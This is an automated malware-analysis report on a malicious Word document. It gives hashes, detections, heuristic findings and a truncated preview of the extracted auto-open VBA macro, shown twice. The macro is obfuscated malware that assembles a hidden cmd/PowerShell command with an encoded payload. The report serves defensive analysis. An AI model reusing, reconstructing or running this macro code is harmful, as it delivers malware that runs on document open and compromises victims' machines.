Office (OLE) malware analysis — malicious · 4ddf0ac0e5b0d0fe

MALICIOUS

Office (OLE)

92.8 KB Created: 2018-08-19 22:45:00 Authoring application: Microsoft Office Word First seen: 2018-08-26

MD5: 21dcde063381ae68e8c4fb9415cd14ae SHA-1: 566b5106c3bfd7de2e27ff554e8cb48f3fbbe981 SHA-256: 4ddf0ac0e5b0d0fe04f366bf1f1a2300a897a6b7fc634f0d6b6f5ee0c6cab2ed

142 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The sample is a malicious Office document containing a VBA macro. The macro is obfuscated but appears to be designed to execute commands, as indicated by the heuristic firings for OLE_LEGACY_WORDBASIC_AUTOEXEC and OLE_VBA_AUTOOPEN. The ClamAV detection further confirms its malicious nature. The primary IOC is the VBA macro file itself.

Heuristics 5

ClamAV: Doc.Malware.Valyria-6691552-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Valyria-6691552-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 46727 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	46727 bytes
SHA-256: `b6962dff010a48b238086c48c728f8dc615e73b3ef6f890c30b17fb3a4d0dd42`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "WYJdzmwfQhLU" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Xdnnqilp" Function OBBPrvopS() On Error Resume Next LGiKuT = 45781 + wcMsSV zWKwWQbIotu = "M" + "d " + "/V ^ " + " /r " + CStr(Chr(DYOQiTR + aHczjFDclmDiT + 34 + ruFBVjTwjjrPM + WUHLiHl)) + " " + "Se^t ^s" LGiKuT = 15911 / 59126 + FtkOG / BKEzm IsArray 71172 + 19399 - 80854 + aElEEW VarType Cos(iYtzt) KjiBbIw = "^7='^o" + "/^:r" + "sh:ll ^" + "-:^ ^" + "JAB^x^A" + "F^?" + "ASpA" + "}^AG^4A" + "^%QB3" LGiKuT = CVar(15) VarType Tan(hzRHUa) QiMUdSTaiBE = "AC^@^A^" + "b/^B" + "i^A" + "GoA^%" + "Q^B" + "jA^eQ^A" + "I" + "A^B" + "O^AG?^" IsArray Int(PCcWTI) jDjZZ = "A" + "^d^" + "A^A^uAF" + "c^A^%^Q" + "^B^iA^_" VarType iaFsN - qGfLYb + 12936 + GNLmz LGiKuT = aFjwWi + IFktdw - pmokbR / vtzXI VarType Second(1) NfdFjbiVzW = "^M^A^b" + "^A^B'A" + "^G?^A" + "^bp^B^" + "@A^DsA" + "^J" LGiKuT = 23150 / dVNut VarType Sgn(WHRYH) VarType 49120 - rHEwaa VarType Round(KZQaXC / jTiLj - 51915 + qPzzO) rEHfWZTtc = "^AB" + "'A^" + "_^_A^d/" + "A^" + "}A" + "CcAa" VarType ALUaP * XQsHb - LXKWHL / RCTRjR VarType VTUZw - FjkUl LGiKuT = dJsTd / pzcLs VarType vvNcIB - DJsMB - 29759 / JQMuA hVYYZAGqZRj = "A^B" + "@A^e^QA" + "cA^A" + "^6^A" + "C^8A^+" + "/Bs^" VarType CStr(26194 + zztEi) IsArray Sqr(jQRsKV) LGiKuT = sCtzwm - 31660 IsArray Log(12) ssIDhuaVo = "AG8" + "Ac" + "/^" + "B^" + "@^" + "A" + "G^" + "MAb/B^s" + "AG/A^%Q" + "BjA^e^" + "Q" + "^A^a" VarType Str(junIB) VarType CDate(hcpjcp) LGiKuT = Rnd(dFSmVP) DhnzlUUJCFK = "^Q^B^2" + "^" + "AG?A^+" + "^p^B^" + "uA" + "^G^?Ad^" + "A^A" + "v^AF" + "^p^A^" + "M^Q^B" + "r^" + "A^_A" + "A^a^A" OBBPrvopS = zWKwWQbIotu + KjiBbIw + QiMUdSTaiBE + jDjZZ + NfdFjbiVzW + rEHfWZTtc + hVYYZAGqZRj + ssIDhuaVo + DhnzlUUJCFK IsArray Tan(EFouAk) LGiKuT = TimeValue(9291) IsArray EJufpM + cBFNpF End Function Function YVAXGaYQHnj() On Error Resume Next IsArray MawQK - mwTvZ LGiKuT = 22959 / QHHbkP LGiKuT = QwQdo / dNqEs NVLhZwfz = "B" + "^@^A" + "e^QAcA" + "A^6A" + "C" + "8A+/^B" + "^l^" + "A^" + "Gc^A^+^" + "Q^Bj^" + "AG8Ab^" LGiKuT = Sin(zZsMYn + JiGnsl - iYqObu - wpETCp) VarType 26442 / wMFkb fLWNjnhL = "p^BjA" + "^G^?^" + "Ac^A" + "B@^A" + "C4^A^" + "Y/^BvAG" + "^@" + "^A^+" + "/^B" LGiKuT = bToPVA + 39104 IsArray CDate(35643 + 38493) VarType fJJYbY - zrwDK DONaLmQBMLM = "z^A" + "FQA^" + "5" + "/^BC^A" + "^F^o^" + "A^QA^B" + "oAeQA" + "^" + "d^" + "AB/ADo" IsArray iNPGAs + cqajW / 70616 * aOoaPJ LGiKuT = nsVzku * 98819 rYlAtYcUiu = "^A+/^" + "A" + "vAG^M" + "A^aQ" + "By" + "A^G^M" + "^A^" + "dQB" + "sAG^8^" + "AcAByA^" + "G^8^Ad" + "^p" VarType PoBbX + OfupL VarType Int(NDFvj - TjRUts) IsArray 47522 * kEVATQ * rqzOM + oWwYd VarType CByte(223) HttauRTSwTw = "^B'^AG_" + "Ab^Q" + "^" + "B" + "^'AG" + "c^A^" + "YQAu^A^" IsArray Sin(7) IsArray UiqGjh / osipb / zMjGX + ojjNKO IsArray 93728 / THhIP LGiKuT = Sqr(WVuYi) VarType 72573 * LkLrCa - 63528 - ZRXwhZ XpQTTPaoO = "G^M^Ab/" + "B^tAC8" + "^A^a" + "Q^Ax^" + "A^" + "eQA" + "^%^p^" + "B^Y" + "A" + "^_AAaAB" + "^@^" IsArray CVar(26) IsArray Oct(vBoUjr) IsArray 82343 - 36872 - WUhCps - mGGbb IsArray CDbl(sYjpjD) nRikSORsJH = "A^" + "e^" + "Q" + "Ac" + "AA^6^AC" + "^8A^+" + "/^BiAG?" + "^A" + "^b" + "^p^B^'" + "^A" + "G^@A" + "^%AB" VarType Month(nGuhO + 87955) VarType 99970 - Fmbww * mkPUwd - RuBwQ LGiKuT = CStr(605) anVuEmP = "^1AG^" + "4A^:Q" + "^" + "B^hA^" + "G@^Aa" + "/^B^y" + "^A^G" + "?A" IsArray 6932 * zOztd IsArray 21967 * IlpAO IsArray Second(uqnCin) iNbsi = "c" + "/^" + "A^u" + "A" + "^G" + "MAb/" + "Bt^A" + "C" + "^8Ac/" + "^B" + "o^A" + "Dc^A" + "dQB@" YVAXGaYQHnj = NVLhZwfz + fLWNjnhL + DONaLmQBMLM + rYlAtYcUiu + HttauRTSwTw + XpQTTPaoO + nRikSORsJH + anVuE ... (truncated)

SHA-256: b6962dff010a48b238086c48c728f8dc615e73b3ef6f890c30b17fb3a4d0dd42

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "WYJdzmwfQhLU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Xdnnqilp"
Function OBBPrvopS()
On Error Resume Next
LGiKuT = 45781 + wcMsSV
zWKwWQbIotu = "M" + "d " + "/V ^  " + " /r " + CStr(Chr(DYOQiTR + aHczjFDclmDiT + 34 + ruFBVjTwjjrPM + WUHLiHl)) + "  " + "Se^t ^s"
LGiKuT = 15911 / 59126 + FtkOG / BKEzm
   IsArray 71172 + 19399 - 80854 + aElEEW
   VarType Cos(iYtzt)
KjiBbIw = "^7='^o" + "/^:r" + "sh:ll ^" + "-:^ ^" + "JAB^x^A" + "F^?" + "ASpA" + "}^AG^4A" + "^%QB3"
LGiKuT = CVar(15)
   VarType Tan(hzRHUa)
QiMUdSTaiBE = "AC^@^A^" + "b/^B" + "i^A" + "GoA^%" + "Q^B" + "jA^eQ^A" + "I" + "A^B" + "O^AG?^"
IsArray Int(PCcWTI)
jDjZZ = "A" + "^d^" + "A^A^uAF" + "c^A^%^Q" + "^B^iA^_"
VarType iaFsN - qGfLYb + 12936 + GNLmz
   LGiKuT = aFjwWi + IFktdw - pmokbR / vtzXI
   VarType Second(1)
NfdFjbiVzW = "^M^A^b" + "^A^B'A" + "^G?^A" + "^bp^B^" + "@A^DsA" + "^J"
LGiKuT = 23150 / dVNut
   VarType Sgn(WHRYH)
   VarType 49120 - rHEwaa
   VarType Round(KZQaXC / jTiLj - 51915 + qPzzO)
rEHfWZTtc = "^AB" + "'A^" + "_^_A^d/" + "A^" + "}A" + "CcAa"
VarType ALUaP * XQsHb - LXKWHL / RCTRjR
   VarType VTUZw - FjkUl
   LGiKuT = dJsTd / pzcLs
   VarType vvNcIB - DJsMB - 29759 / JQMuA
hVYYZAGqZRj = "A^B" + "@A^e^QA" + "cA^A" + "^6^A" + "C^8A^+" + "/Bs^"
VarType CStr(26194 + zztEi)
   IsArray Sqr(jQRsKV)
   LGiKuT = sCtzwm - 31660
   IsArray Log(12)
ssIDhuaVo = "AG8" + "Ac" + "/^" + "B^" + "@^" + "A" + "G^" + "MAb/B^s" + "AG/A^%Q" + "BjA^e^" + "Q" + "^A^a"
VarType Str(junIB)
   VarType CDate(hcpjcp)
   LGiKuT = Rnd(dFSmVP)
DhnzlUUJCFK = "^Q^B^2" + "^" + "AG?A^+" + "^p^B^" + "uA" + "^G^?Ad^" + "A^A" + "v^AF" + "^p^A^" + "M^Q^B" + "r^" + "A^_A" + "A^a^A"
OBBPrvopS = zWKwWQbIotu + KjiBbIw + QiMUdSTaiBE + jDjZZ + NfdFjbiVzW + rEHfWZTtc + hVYYZAGqZRj + ssIDhuaVo + DhnzlUUJCFK
   IsArray Tan(EFouAk)
   LGiKuT = TimeValue(9291)
   IsArray EJufpM + cBFNpF
End Function
Function YVAXGaYQHnj()
On Error Resume Next
IsArray MawQK - mwTvZ
   LGiKuT = 22959 / QHHbkP
   LGiKuT = QwQdo / dNqEs
NVLhZwfz = "B" + "^@^A" + "e^QAcA" + "A^6A" + "C" + "8A+/^B" + "^l^" + "A^" + "Gc^A^+^" + "Q^Bj^" + "AG8Ab^"
LGiKuT = Sin(zZsMYn + JiGnsl - iYqObu - wpETCp)
   VarType 26442 / wMFkb
fLWNjnhL = "p^BjA" + "^G^?^" + "Ac^A" + "B@^A" + "C4^A^" + "Y/^BvAG" + "^@" + "^A^+" + "/^B"
LGiKuT = bToPVA + 39104
   IsArray CDate(35643 + 38493)
   VarType fJJYbY - zrwDK
DONaLmQBMLM = "z^A" + "FQA^" + "5" + "/^BC^A" + "^F^o^" + "A^QA^B" + "oAeQA" + "^" + "d^" + "AB/ADo"
IsArray iNPGAs + cqajW / 70616 * aOoaPJ
   LGiKuT = nsVzku * 98819
rYlAtYcUiu = "^A+/^" + "A" + "vAG^M" + "A^aQ" + "By" + "A^G^M" + "^A^" + "dQB" + "sAG^8^" + "AcAByA^" + "G^8^Ad" + "^p"
VarType PoBbX + OfupL
   VarType Int(NDFvj - TjRUts)
   IsArray 47522 * kEVATQ * rqzOM + oWwYd
   VarType CByte(223)
HttauRTSwTw = "^B'^AG_" + "Ab^Q" + "^" + "B" + "^'AG" + "c^A^" + "YQAu^A^"
IsArray Sin(7)
   IsArray UiqGjh / osipb / zMjGX + ojjNKO
   IsArray 93728 / THhIP
   LGiKuT = Sqr(WVuYi)
   VarType 72573 * LkLrCa - 63528 - ZRXwhZ
XpQTTPaoO = "G^M^Ab/" + "B^tAC8" + "^A^a" + "Q^Ax^" + "A^" + "eQA" + "^%^p^" + "B^Y" + "A" + "^_AAaAB" + "^@^"
IsArray CVar(26)
   IsArray Oct(vBoUjr)
   IsArray 82343 - 36872 - WUhCps - mGGbb
   IsArray CDbl(sYjpjD)
nRikSORsJH = "A^" + "e^" + "Q" + "Ac" + "AA^6^AC" + "^8A^+" + "/^BiAG?" + "^A" + "^b" + "^p^B^'" + "^A" + "G^@A" + "^%AB"
VarType Month(nGuhO + 87955)
   VarType 99970 - Fmbww * mkPUwd - RuBwQ
   LGiKuT = CStr(605)
anVuEmP = "^1AG^" + "4A^:Q" + "^" + "B^hA^" + "G@^Aa" + "/^B^y" + "^A^G" + "?A"
IsArray 6932 * zOztd
   IsArray 21967 * IlpAO
   IsArray Second(uqnCin)
iNbsi = "c" + "/^" + "A^u" + "A" + "^G" + "MAb/" + "Bt^A" + "C" + "^8Ac/" + "^B" + "o^A" + "Dc^A" + "dQB@"
YVAXGaYQHnj = NVLhZwfz + fLWNjnhL + DONaLmQBMLM + rYlAtYcUiu + HttauRTSwTw + XpQTTPaoO + nRikSORsJH + anVuE
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.